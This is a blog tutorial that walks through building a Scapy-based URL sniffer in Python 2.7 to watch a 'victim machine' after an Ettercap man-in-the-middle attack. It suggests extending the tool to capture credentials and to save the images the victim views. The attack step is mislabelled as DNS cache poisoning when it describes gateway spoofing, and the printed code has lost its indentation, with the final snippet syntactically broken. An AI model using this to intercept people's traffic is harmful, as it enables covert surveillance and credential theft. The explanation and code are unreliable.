Developing a URL Sniffer in Python | Lucideus Research

URL Sniffer can be a handy tool for a security researcher, to extract information regarding the nature of data flow in a victim machine. It can be a useful aid to monitor the content being accessed on the victim machine. In this post we will describe the procedure to code a URL Sniffer in python 2.7, using Scapy library. We will further explain how you can build upon this tool to develop other exciting monitoring tools for your hacking arsenal.

Scapy

Let’s begin with understanding of Scapy library in python. This library is like a swiss army knife for security researchers and network programmers, with plethora of functions to play with network layers. This is a packet manipulation library to forge, sniff and transmit packets. It can easily replace upto 85% of nmap, hping, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc. In this post we will leverage Scapy to manipulate HTTP layer and sniff the URLs being accessed in the victim machine. You can install scapy easily by using following commands:

$ pip install scapy
$ pip install scapy-http

Man In The Middle

The next step after installing Scapy is to do DNS cache poisoning using tools like Ettercap to perform Man in the Middle attack. This will overwrite the cache and the victim machine will consider our machine to be the default gateway. This activity will ensure that the data going in and out of the victim machine will route through our machine. Now, we need to sniff the packets from the victim machine to extract URLs.

Figure 1: DNS cache poisoning using Ettercap

After Man in The Middle attack, we can develop the sniffer and read the packets.

Sniffer Development

First import all the required modules from Scapy library.

from scapy.all import IP
from scapy.all import sniff
from scapy.layers import http

  • IP module is used for manipulation of IP packets.
  • Sniff module contains methods for sniffing different types of packets like TCP, UDP, DHCP etc.
  • Http module is used for manipulation of HTTP packets.

After importing all the required modules, now we will write the sniffer module to extract URLs.

def sniff_urls(packet):
   if packet.haslayer(http.HTTPRequest):
http_layer = packet.getlayer(http.HTTPRequest)
ip_layer = packet.getlayer(IP)
print '\n{0[src]} - {1[Method]} - http://{1[Host]}{1[Path]}'.format(ip_layer.fields,http_layer.fields)
This method initially applies the filter to sniff all the HTTP requests. Then it extracts the data from the packet’s IP layer which has the URLs. and finally it prints all the URLs on the screen. After this we will start the sniffer.
sniff(filter='tcp', prn=sniff_urls)

The sniff method starts the sniffer and it has two parameters:
  • filter: This will extract all the TCP packets from the captured data.
  • prn: This will use the sniff_urls method to display the required information (URLs) from the captured TCP packets.

The final sniffer code looks like:

from scapy.all import IP
from scapy.all import sniff
from scapy.layers import http

# Extracting all URLS

def sniff_urls(packet):
   if packet.haslayer(http.HTTPRequest):
http_layer = packet.getlayer(http.HTTPRequest)
ip_layer = packet.getlayer(IP)
print '\n{0[src]} - {1[Method]} - http://{1[Host]}{1[Path]}'.format(ip_layer.fields, http_layer.fields)

# Start sniffing the network.
sniff(filter='tcp', prn=sniff_urls)
After, this when we run the sniffer sample output is generated as shown.

Figure 2: Sniffed URLs




Way Forward

This simple yet effective tool can easily be used for monitoring purpose can be hacked together within 30 minutes or so. Moreover, this tool can be further extended to sniff several other requests like DHCP, UDP, sensitive credentials etc. It can also be used to display / save the images being viewed by the victim (just like your own Driftnet) using something like the below code snippet.

import urllib

urllib.urlretrieve('http://{1[Host]}{1[Path]}'.format(ip_layer.fields, http_layer.fields, “img_name.png”)